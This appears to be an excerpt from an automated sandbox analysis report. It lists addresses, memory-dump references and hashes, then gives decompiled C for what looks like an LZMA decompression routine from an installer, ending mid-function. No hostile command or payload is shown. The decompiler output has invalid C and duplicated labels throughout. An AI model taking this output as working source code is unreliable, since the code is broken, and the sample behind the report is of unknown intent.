                        0x004063c3
                        0x004063c6
                        0x004063c9
                        0x004063cc
                        0x004063cf
                        0x004063d2
                        0x004063d5
                        0x004063d7
                        0x004063da
                        0x004063dd
                        0x004063e0
                        0x004063e2
                        0x004063e2
                        0x004063e2
                        0x00000000
                        0x00000000
                        0x00406544
                        0x00406544
                        0x00406548
                        0x00406a0e
                        0x00000000
                        0x00406a0e
                        0x0040654e
                        0x00406551
                        0x00406554
                        0x00406557
                        0x00406559
                        0x00406559
                        0x00406559
                        0x0040655c
                        0x0040655f
                        0x00406562
                        0x00406565
                        0x00406568
                        0x0040656b
                        0x0040656c
                        0x0040656e
                        0x0040656e
                        0x0040656e
                        0x00406571
                        0x00406574
                        0x00406577
                        0x0040657a
                        0x0040657a
                        0x0040657a
                        0x0040657d
                        0x0040657f
                        0x0040657f
                        0x00000000
                        0x00000000
                        0x004067c1
                        0x004067c1
                        0x004067c1
                        0x004067c5
                        0x00000000
                        0x00000000
                        0x004067cb
                        0x004067ce
                        0x004067d1
                        0x004067d4
                        0x004067d6
                        0x004067d6
                        0x004067d6
                        0x004067d9
                        0x004067dc
                        0x004067df
                        0x004067e2
                        0x004067e5
                        0x004067e8
                        0x004067e9
                        0x004067eb
                        0x004067eb
                        0x004067eb
                        0x004067ee
                        0x004067f1
                        0x004067f4
                        0x004067f7
                        0x004067fa
                        0x004067fe
                        0x00406800
                        0x00406803
                        0x00000000
                        0x00406805
                        0x00406582
                        0x00406582
                        0x00000000
                        0x00406582
                        0x00406803
                        0x00406a38
                        0x00000000
                        0x00000000
                        0x00406067
                        0x00406a6f
                        0x00406a6f
                        0x00000000
                        0x00406a6f
                        0x004068bc
                        0x00406843
                        0x00406840
                        0x00000000
                        0x00406477

                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 17d2eea9f7cdce8bc4a623307af2d8c55e83d6c30150793070c9d330b5787031
                        • Instruction ID: ed496f49c15cb1a0cee1f91230a4d4bd76d3fd25087baa69d2252d5f7e71f344
                        • Opcode Fuzzy Hash: 17d2eea9f7cdce8bc4a623307af2d8c55e83d6c30150793070c9d330b5787031
                        • Instruction Fuzzy Hash: 30713271E00228CFDF28DFA8C8547ADBBB1FB44305F15806AD906BB281D7785A96DF44
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00406591, Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                        Download Yara Rule
                        C-Code - Quality: 98%
                        			E00406591() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M00406A77))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4)); // executed
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8)); // executed
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
